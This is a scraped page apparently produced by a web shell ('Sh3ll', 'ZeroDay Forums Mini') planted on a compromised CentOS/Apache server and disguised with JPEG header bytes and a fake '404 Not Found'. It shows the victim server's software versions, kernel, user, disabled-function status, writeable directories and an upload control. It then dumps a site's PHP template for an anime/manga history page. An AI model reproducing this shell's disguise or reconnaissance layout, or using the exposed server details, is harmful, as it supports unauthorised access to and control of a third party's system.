ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/okanime.top/code/manga/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/okanime.top/code/manga/history_tpl.php
<div class="Body Container follow_manga">
    <div class="Content">
        <nav aria-label="breadcrumb">
            <ol class="breadcrumb">
                <li class="breadcrumb-item"><a href="/"><i class="fa fa-home"></i></a></li>
                <li itemprop="itemListElement" itemscope itemtype="http://schema.org/ListItem" class="breadcrumb-item"><a href="/genres/" itemprop="item" style="color:#ad85d9!important;">All anime</a></li>
                <li class="breadcrumb-item">History</li>
            </ol>
        </nav>
        <div class="TpRwCont">
            <main>
                <ul class="nav nav-tabs mb-2">
                    <li class="nav-item">
                        <a class="nav-link <?php if($type=='list'){echo 'active';}?>" href="/history/">All history</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link <?php if($type=='account'){echo 'active';}?>" href="/history/account/">By account</a>
                    </li>
                </ul>
                <div class="clear-all-history"><a href="javascript:void(0);" class="delete-all-history"><i class="fas fa-trash"></i> Clear all history</a></div>
                <?php
                if(!empty($list)){
                    ?>
                    <section>
                        <ul class="MovieList Rows AX A06 B04 C03 E20">
                            <?php
                            if($type=='list'){
                                echo $list;
                            }
                            if($type=='account') {
                                if (!empty($list_account)) {
                                    echo $list_account;
                                }
                            }
                            ?>
                        </ul>
                    </section>
                    <div class="Bot text-center">
                        <nav aria-label="Page navigation example">
                            <ul class="pagination">
                                <?php echo $nav;?>
                            </ul>
                        </nav>
                    </div>
                <?php }else{ ?>
                    <div class="row mt-2">
                        <div class="alert alert-warning alert-dismissible fade show" role="alert">
                            You don't have any watching anime history<br/>
                            You should <a href="/login.html">Sign in</a> to access your history anime anywhere.
                            <button type="button" class="btn-close" data-bs-dismiss="alert" aria-label="Close"></button>
                        </div>
                    </div>
                <?php } ?>
            </main>

            <aside class="widget-area" role="complementary">

                <?php
                $txt_follow = follow_manga();
                if(!empty($txt_follow)){
                    ?>
                    <section class="Wdgt" id="showFollow">
                        <div class="Title">Follow</div>
                        <ul class="MovieList">
                            <?php echo $txt_follow;?>
                            <!--<li><a href="danh-muc.html">Xem th&ecirc;m..</a></li>-->
                        </ul>
                    </section>
                <?php } ?>

                <ul class="nav nav-tabs bg-dark <?php if(!empty($txt_history) or !empty($txt_follow)){echo'mt-2';}?>" id="top_manga" data-bs-theme="dark">
                    <li class="nav-item">
                        <a class="nav-link active" href="javascript:void(0);" data-bs-toggle="tab" data-tab-target="topmonth-tab-pane">Top month</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link" href="javascript:void(0);" data-bs-toggle="tab" data-tab-target="topweek-tab-pane">Top week</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link" data-bs-toggle="tab" data-tab-target="topday-tab-pane" href="javascript:void(0);">Top day</a>
                    </li>
                </ul>
                <section class="Wdgt my_tab_content" id="topmonth-tab-pane">
                    <ul class="MovieList mt-2">
                        <?php echo top_manga_month();?>
                    </ul>
                </section>
                <section class="Wdgt my_tab_content" id="topweek-tab-pane">
                    <ul class="MovieList mt-2">
                        <?php echo top_manga_week();?>
                    </ul>
                </section>
                <section class="Wdgt my_tab_content" id="topday-tab-pane">
                    <ul class="MovieList mt-2">
                        <?php echo top_manga_date();?>
                    </ul>
                </section>

                <div class="Dvr-300"></div>
            </aside>
        </div>
    </div>
</div>

ZeroDay Forums Mini